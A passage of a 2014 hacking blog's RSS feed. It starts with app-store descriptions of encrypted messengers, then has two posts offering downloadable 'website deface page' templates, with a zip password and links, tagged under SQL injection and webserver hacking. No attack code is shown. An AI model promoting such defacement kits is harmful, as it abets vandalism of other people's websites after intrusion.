&lt;div&gt;
Unlike other popular messaging apps (including those claiming to use encryption), even we as the server operator have absolutely no way to read your messages.&lt;/div&gt;
&lt;div&gt;
Features:&lt;/div&gt;
&lt;div&gt;
• End-to-end encryption of text messages, images, videos and GPS locations&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
• Contact synchronization (optional): find other Threema users automatically&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
• Send images and videos&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
• Share your location on a map&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
• Verify your contacts' public keys by scanning a QR code from their mobile phone, all within the app&lt;/div&gt;
&lt;div&gt;
Threema is Made in Switzerland, and all servers are hosted there as well for maximum privacy.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="border-bottom: green dashed 2px; text-align: left;"&gt;
&lt;a href="https://play.google.com/store/apps/details?id=ch.threema.app" rel="nofollow" target="_blank"&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Download&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Surespot Encrypted Messenger&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div&gt;
Description&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCYwIuQqc1W7Oa_l5shZDLPV9fyYIB143gj9hjtVYs4GJp_z4_3qlTVe_AXFzv6YRHMMGne22jUoZzyefF95vmbyKUVML8HnTa2v9Kiy_thFd9BeuSce7vf6DOOHyaOqTX9mkWhb8BMd8/s1600/surespot-encrypted-messenger-hackhippo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCYwIuQqc1W7Oa_l5shZDLPV9fyYIB143gj9hjtVYs4GJp_z4_3qlTVe_AXFzv6YRHMMGne22jUoZzyefF95vmbyKUVML8HnTa2v9Kiy_thFd9BeuSce7vf6DOOHyaOqTX9mkWhb8BMd8/s1600/surespot-encrypted-messenger-hackhippo.jpg" height="320" width="179" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;NEW FEATURE- Voice Messaging. If your eyes or hands are busy, your keyboard too cumbersome, or you just want to say it instead of type it- voice messages are sent with the same exceptional end to end encryption as the rest of your surespot messages. Simply hold down the microphone button to record your voice message and release to send. Activate the feature from within surespot to start sending voice messages (it is free to receive and play them) and enjoy speaking freely.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Be sure no one else can see your mobile messages. Use surespot and everything you send can only be read by the person you sent it to. Period. Everything sent using surespot is end-to-end encrypted with symmetric-key encryption (256 bit AES-GCM) using keys created with 521 bit ECDH shared secret derivation, but you wont notice because security in surespot is built-in, not a layer over something else. Be confident sending private information and pictures, you have control over your messages, when you delete a sent message it will be removed from the receiver's phone and images are not shareable unless you make them so. Multiple identities allow you to be who you want with just who you want, and if anyone gets annoying you can block them. Surespot does not require or store your phone number or email address and we don't mine your data, no advertisements here!&lt;/li&gt;
&lt;li&gt;Surespot uses your mobile data plan and Wi-Fi so you don’t get texting charges, especially important for those friends in other countries.&lt;/li&gt;
&lt;li&gt;Surespot is OPEN SOURCE software, this creates transparency and invites peer review so you can be confident in our claims. If you wish to contribute/review you can find us on GitHub listed under 'surespot'.&lt;/li&gt;
&lt;li&gt;We always appreciate your feedback and questions. Please contact us&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style="border-bottom: green dashed 2px; text-align: left;"&gt;
&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=com.twofours.surespot" rel="nofollow" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="font-size: large;"&gt;TextSecure Private Messenger&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
Description:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFtgotzv0js8LgkhZyKbW9Z237sPRB6RrPcumPCCrncJjzixO0fRSpA3sYlXZ40Q75ccRhnJmk9CK3gGzaIQwOZiVuKZSsKxgVaHHOiWRp9HekyZewntPqLZhXBqsEhs5CHbsExMQMkZk/s1600/textsecure-private-messenger-hackhippo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFtgotzv0js8LgkhZyKbW9Z237sPRB6RrPcumPCCrncJjzixO0fRSpA3sYlXZ40Q75ccRhnJmk9CK3gGzaIQwOZiVuKZSsKxgVaHHOiWRp9HekyZewntPqLZhXBqsEhs5CHbsExMQMkZk/s1600/textsecure-private-messenger-hackhippo.jpg" height="320" width="191" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
TextSecure is a messaging app that allows you to take back your privacy while easily communicating with friends.&lt;br /&gt;
Using TextSecure, you can communicate instantly while avoiding SMS fees, create groups so that you can chat in real time with all your friends at once, and share media or attachments all with complete privacy. The server never has access to any of your communication and never stores any of your data.&lt;br /&gt;
★ Private. TextSecure uses an advanced end to end encryption protocol that provides privacy for every message every time.&lt;br /&gt;
★ Open Source. TextSecure is Free and Open Source, enabling anyone to verify its security by auditing the code. TextSecure is the only private messenger that uses open source peer-reviewed cryptographic protocols to keep your messages safe.&lt;br /&gt;
★ Group Chat. TextSecure allows you to create encrypted groups so you can have private conversations with all your friends at once. Not only are the messages encrypted, but the TextSecure server never has access to any group metadata such as the membership list, group title, or group icon.&lt;br /&gt;
★ Fast. The TextSecure protocol is designed to operate in the most constrained environment possible. Using TextSecure, messages are instantly delivered to friends.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="border-bottom: green dashed 2px; text-align: left;"&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=org.thoughtcrime.securesms" rel="nofollow" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;RedPhone Secure Calls:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Description:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS-VfCXQudM3S_7LJPKUnFg7CehgxOcER_wxLMQQ74N6SO78JqoJF_BFG0I7q4upIovhMAUOumxPdIBJrMve2KnkgFSag6ogu729je9xZXCT9kprjnVn3vyYrWP0Lb7ENbOSJfZrhSG6E/s1600/RedPhone-Secure-Calls-hackhippo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS-VfCXQudM3S_7LJPKUnFg7CehgxOcER_wxLMQQ74N6SO78JqoJF_BFG0I7q4upIovhMAUOumxPdIBJrMve2KnkgFSag6ogu729je9xZXCT9kprjnVn3vyYrWP0Lb7ENbOSJfZrhSG6E/s1600/RedPhone-Secure-Calls-hackhippo.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
Like privacy? Secure your calls for free with RedPhone. It's that simple.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
RedPhone provides end-to-end encryption for your calls, securing your conversations so that nobody can listen in.&lt;/div&gt;
&lt;div&gt;
★ RedPhone uses your normal phone number to make and receive calls, so you don't need yet another identifier.&lt;/div&gt;
&lt;div&gt;
★ Use the default system dialer and contacts apps to make calls as you normally would.&lt;/div&gt;
&lt;div&gt;
★ RedPhone will give you the opportunity to upgrade to encrypted calls whenever the person you're calling also has RedPhone installed.&lt;/div&gt;
&lt;div&gt;
★ RedPhone calls are encrypted end-to-end, but function just like you're used to.&lt;/div&gt;
&lt;div&gt;
★ Free and Open Source, enabling anyone to verify its security by auditing the code.&lt;/div&gt;
&lt;div&gt;
★ Uses wifi or data, not your plan's voice minutes.&lt;/div&gt;
&lt;div&gt;
More information:&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://www.whispersystems.org/"&gt;http://www.whispersystems.org&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
Please file any bugs, issues, or feature requests at:&lt;/div&gt;
&lt;div&gt;
&lt;a href="https://github.com/whispersystems/redphone/issues"&gt;https://github.com/whispersystems/redphone/issues&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
Secure Calls, Private Calls, Secure VoIP, Private VoIP, Encrypted VoIP, Private Conversations, Free Calls&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="border-bottom: green dashed 2px; text-align: left;"&gt;
&lt;a href="https://play.google.com/store/apps/details?id=org.thoughtcrime.redphone" rel="nofollow" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: xx-small;"&gt;Source: Google Play,The Hackers News&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/03/top-5-secure-chating-apps-with-end-to.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVuUkmbTZyok11V5l4IlLNBc1goDrBJ9VK3gZvbJqjbM4ijjtkg3V7K1EFRhebp6gmCcGtP1re5r2XCzSQo7kYVhECWHBayEgm8fhUd0nC1WcfzIbzzK7wozROJqoHA6HESEz1BiIlqM8/s72-c/telegram-hack-hippo.png" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-1290496006276729937</guid><pubDate>Thu, 27 Feb 2014 13:23:00 +0000</pubDate><atom:updated>2014-02-27T05:23:42.901-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking Web Applications</category><category domain="http://www.blogger.com/atom/ns#">Hacking Webservers</category><category domain="http://www.blogger.com/atom/ns#">SQL Injection</category><title>Website Deface Page</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: center;"&gt;
Download Free "Website Deface Page"&lt;/h2&gt;
&lt;div&gt;
&lt;div style="text-align: center;"&gt;
Dear Friends Download Hack Hippo latest and Unique Website Deface Page.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
Version 0.1&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_sGJ90W-R8ToTz9bbrGKGrsA6vRJWGHQT2Qa01iz4tbBmMMfx5a0N58jwr7QxYGxCt1Dig1j4tiRWG6RmHsyHlfaqIEsDgqdtsxrd2uhqyQN4GBFBBTCMbXpfSQI-Z5ojTrhziRADPYg/s1600/website-deface-page+v0.1+(1).jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Website Deface Page" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_sGJ90W-R8ToTz9bbrGKGrsA6vRJWGHQT2Qa01iz4tbBmMMfx5a0N58jwr7QxYGxCt1Dig1j4tiRWG6RmHsyHlfaqIEsDgqdtsxrd2uhqyQN4GBFBBTCMbXpfSQI-Z5ojTrhziRADPYg/s1600/website-deface-page+v0.1+(1).jpg" height="91" title="Website Deface Page" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;h2&gt;
Website Deface Page&lt;/h2&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYhVNLbbmv9SP4X1ScSqdoLlDX9q03RYrm-ubI-LWS5bbFlGSK0ykdqkzcgi4DQ6ie2X4uUYEype3fHbRopwiGb9YiD23L4eNqy8JoPTSGydWpaM2zREVuNvJN_ZXJEQvi-8SQHvW_W8Y/s1600/website-deface-page+v0.1+(2).jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;img alt="Website Deface Page" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYhVNLbbmv9SP4X1ScSqdoLlDX9q03RYrm-ubI-LWS5bbFlGSK0ykdqkzcgi4DQ6ie2X4uUYEype3fHbRopwiGb9YiD23L4eNqy8JoPTSGydWpaM2zREVuNvJN_ZXJEQvi-8SQHvW_W8Y/s1600/website-deface-page+v0.1+(2).jpg" height="94" title="Website Deface Page" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;h2&gt;
Website Deface Page&lt;/h2&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqOCsBkSsnKEqrTu-OIztT-KDU7pucK-e-BJCWXllsPcLL97awZbSQwUWXjbfAi6aEC1Rqzas8P5bSbKzQiDHWfwwC3Y4dveRiK5IPANNUfS_CJBDnbuG_Fnq3pozK51KVRdZlQFcSUQ/s1600/website-deface-page+v0.1+(3).jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Website Deface Page" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqOCsBkSsnKEqrTu-OIztT-KDU7pucK-e-BJCWXllsPcLL97awZbSQwUWXjbfAi6aEC1Rqzas8P5bSbKzQiDHWfwwC3Y4dveRiK5IPANNUfS_CJBDnbuG_Fnq3pozK51KVRdZlQFcSUQ/s1600/website-deface-page+v0.1+(3).jpg" height="93" title="Website Deface Page" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;h2&gt;
Website Deface Page&lt;/h2&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9RFcjuVb1mCcflkGHrZQM6Vhfzza5Sg9iM4nj_BZikeGTEYc4dU6t0z9P1CmvkK368rYZsHn8Z2_-FtVKEp6hkmoAGRUC0Ry9_hZoLxL_EXG1twXe2mMHeZFFiwyiFsFWhzgGF_xnJ64/s1600/website-deface-page+v0.1+(4).jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;img alt="Website Deface Page" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9RFcjuVb1mCcflkGHrZQM6Vhfzza5Sg9iM4nj_BZikeGTEYc4dU6t0z9P1CmvkK368rYZsHn8Z2_-FtVKEp6hkmoAGRUC0Ry9_hZoLxL_EXG1twXe2mMHeZFFiwyiFsFWhzgGF_xnJ64/s1600/website-deface-page+v0.1+(4).jpg" height="92" title="Website Deface Page" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;h2&gt;
Website Deface Page&lt;/h2&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="color: lime; font-size: large;"&gt;Zip Pass:hackhippo&lt;/span&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/SL5cxX" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;br /&gt;
&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/4wdkbjs99krj78v/Deface_Page-V_0.1.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;center&gt;
© HaCkHiPp0-TeaM ! 2013&lt;/center&gt;
&lt;center&gt;
&lt;a href="http://hackhippo.blogspot.com/"&gt;http://hackhippo.blogspot.com&lt;/a&gt;&lt;/center&gt;
&lt;center&gt;
&lt;a href="http://hackhippo.blogspot.com/"&gt;HaCkHiPp0-TeaM&lt;/a&gt;&amp;nbsp;&lt;a href="https://www.facebook.com/sahilrai85"&gt;R0oTx:Sahil_Rai&lt;/a&gt;&lt;/center&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/02/website-deface-page.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_sGJ90W-R8ToTz9bbrGKGrsA6vRJWGHQT2Qa01iz4tbBmMMfx5a0N58jwr7QxYGxCt1Dig1j4tiRWG6RmHsyHlfaqIEsDgqdtsxrd2uhqyQN4GBFBBTCMbXpfSQI-Z5ojTrhziRADPYg/s72-c/website-deface-page+v0.1+(1).jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-4658821779000997548</guid><pubDate>Thu, 27 Feb 2014 12:28:00 +0000</pubDate><atom:updated>2014-02-27T05:36:12.727-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Hacking Web Applications</category><category domain="http://www.blogger.com/atom/ns#">Hacking Webservers</category><category domain="http://www.blogger.com/atom/ns#">SQL Injection</category><title>Deface page</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: center;"&gt;
Download Free "Website Deface Page"&lt;/h2&gt;
&lt;div style="text-align: center;"&gt;
Dear Friends Download Hack Hippo latest and Unique Website Deface Page.&lt;br /&gt;
Version 1.0&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEJAwKEosmeI0FvL2ns6dxuo4OOmZxeuYX4P7h6PSdIcJE0FBucZwJvLwaMZtRhlX5Sju-16xXBdP4sEFxEkpM7wHMKu3lbwhpX0YIY1tsojOJv7TuH7cdryFQr7vkMDEodZxSl_jdk3g/s1600/website-deface-page.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Website Deface Page" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEJAwKEosmeI0FvL2ns6dxuo4OOmZxeuYX4P7h6PSdIcJE0FBucZwJvLwaMZtRhlX5Sju-16xXBdP4sEFxEkpM7wHMKu3lbwhpX0YIY1tsojOJv7TuH7cdryFQr7vkMDEodZxSl_jdk3g/s1600/website-deface-page.jpg" height="299" title="Website Deface Page" width="535" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;h2&gt;
Website Deface Page&lt;/h2&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="color: lime; font-size: large;"&gt;Zip Pass:hackhippo&lt;/span&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/6WDXhy" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;br /&gt;
&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/t7dp6dzbf599l1p/Deface_Page-V1.0.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/02/deface-page.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEJAwKEosmeI0FvL2ns6dxuo4OOmZxeuYX4P7h6PSdIcJE0FBucZwJvLwaMZtRhlX5Sju-16xXBdP4sEFxEkpM7wHMKu3lbwhpX0YIY1tsojOJv7TuH7cdryFQr7vkMDEodZxSl_jdk3g/s72-c/website-deface-page.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-1619906729871912731</guid><pubDate>Tue, 04 Feb 2014 09:59:00 +0000</pubDate><atom:updated>2014-02-04T03:05:35.198-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Ethical 